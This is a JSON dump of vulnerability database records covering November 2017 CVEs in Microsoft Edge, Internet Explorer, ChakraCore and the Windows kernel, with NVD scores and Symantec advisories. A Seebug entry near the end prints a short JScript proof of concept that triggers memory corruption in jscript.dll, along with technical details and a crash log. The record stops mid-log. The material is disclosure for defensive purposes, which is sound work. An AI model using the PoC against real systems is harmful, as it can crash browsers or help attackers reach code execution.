\"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11862, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11846", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11846"], "modified": "2017-12-01T15:34:00", "cpe": ["cpe:/a:microsoft:chakracore:*", "cpe:/a:microsoft:edge:*", "cpe:/a:microsoft:internet_explorer:*"], "id": "CVE-2017-11846", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11846", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:chakracore:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Internet Explorer in Microsoft Windows 7 SP1, 
Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Microsoft Edge and Internet Explorer in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11834.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11791", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11791"], "modified": "2017-12-07T17:28:00", "cpe": ["cpe:/a:microsoft:chakracore:*", "cpe:/a:microsoft:edge:*", "cpe:/a:microsoft:internet_explorer:*"], "id": "CVE-2017-11791", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11791", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:chakracore:*:*:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to trick a user into loading a page containing malicious content, due to how the Edge Content Security Policy (CSP) validates documents, aka \"Microsoft Edge Security Feature Bypass Vulnerability\". This CVE ID is unique from CVE-2017-11872 and CVE-2017-11874.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11863", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11863"], "modified": "2017-12-01T18:14:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11863", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows 
Server 2016 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11862, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11866", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11866"], "modified": "2017-12-01T18:14:00", "cpe": ["cpe:/a:microsoft:chakracore:*", "cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11866", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:chakracore:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", 
"description": "Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to take control of an affected system, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11862, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11839", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11839"], "modified": "2017-12-01T15:09:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11839", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11839", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": 
"2018-03-12T10:28:39", "bulletinFamily": "software", "cvelist": ["CVE-2017-11844"], "description": "### Description\n\nMicrosoft Edge is prone to an information disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101707", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101707", "type": "symantec", "title": "Microsoft Edge CVE-2017-11844 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:43:08", "bulletinFamily": "software", "cvelist": ["CVE-2017-11874"], "description": "### Description\n\nMicrosoft Edge is prone to a security-bypass vulnerability. 
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101750", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101750", "type": "symantec", "title": "Microsoft Edge CVE-2017-11874 Security Bypass Vulnerability", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-12T02:29:09", "bulletinFamily": "software", "cvelist": ["CVE-2017-11803"], "description": "### Description\n\nMicrosoft Edge is prone to an information disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101704", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101704", "type": "symantec", "title": "Microsoft Edge CVE-2017-11803 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-12T02:29:11", "bulletinFamily": "software", "cvelist": ["CVE-2017-11834"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101725", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101725", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11834 Information Disclosure Vulnerability", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:41:21", "bulletinFamily": "software", "cvelist": ["CVE-2017-11862"], "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101724", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101724", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11862 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T06:16:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-11851"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. 
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101763", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101763", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-11851 Local Information Disclosure Vulnerability", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-13T06:16:35", "bulletinFamily": "software", "cvelist": ["CVE-2017-11848"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Internet Explorer 9, 10, and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101709", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101709", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11848 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-13T12:07:58", "bulletinFamily": "software", "cvelist": ["CVE-2017-11842"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101719", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101719", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-11842 Local Information Disclosure Vulnerability", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-12T04:24:48", "bulletinFamily": "software", "cvelist": ["CVE-2017-11861"], "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101723", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101723", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11861 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:41:26", "bulletinFamily": "software", "cvelist": ["CVE-2017-11849"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. 
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101762", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101762", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-11849 Local Information Disclosure Vulnerability", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-12-25T18:39:08", "description": "There is an uninitialized variable vulnerability in jscript.dll. 
This issue could potentially be exploited through multiple vectors:\r\n\r\n - By opening a malicious web page in Internet Explorer.\r\n\r\n - [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.\r\n\r\nThe issue has been verified on 64-bit Windows 10 with the most recent patches applied.\r\n\r\nPoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might not work very reliably due to the nature of the issue, please see the technical details below):\r\n\r\n```\r\n<!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\nvar x = new URIError(new Array(), undefined, undefined);\r\nString.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));\r\nArray.prototype.slice.call(1);\r\n</script>\r\n```\r\n\r\n### Technical details:\r\n\r\nThe issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).\r\n\r\nJsArraySlice looks approximately like:\r\n```\r\nint JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {\r\n VAR object;\r\n VAR length;\r\n NameTbl *nametable;\r\n\r\n if(!ConvertToObject(session, this, &object, 0)) {\r\n //set error and return\r\n }\r\n if(!IsJSObject(&object, &nametable)) {\r\n //set error and return\r\n }\r\n if(nametable->GetVal(&g_sym_length, &length) < 0) {\r\n //set error and return \r\n }\r\n if(length->type != TYPE_INT) {\r\n ConvertToScalar(session, &length, &length, 3, 1);\r\n }\r\n\r\n ...\r\n\r\n}\r\n```\r\nThe issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. 
Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).\r\n\r\n### Debug log:\r\n```\r\n(a3c.bd8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!InvokeDispatch+0xbd:\r\n00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????\r\n\r\n0:014> r\r\nrax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904\r\nrdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904\r\nrip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0\r\n r8=000000f42f0fb230 r9=000000f42f0fb2a0 r10=0000000000000080\r\nr11=5555555511140000 r12=0000000000000000 r13=0000000000000000\r\nr14=000002a7533c5a70 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 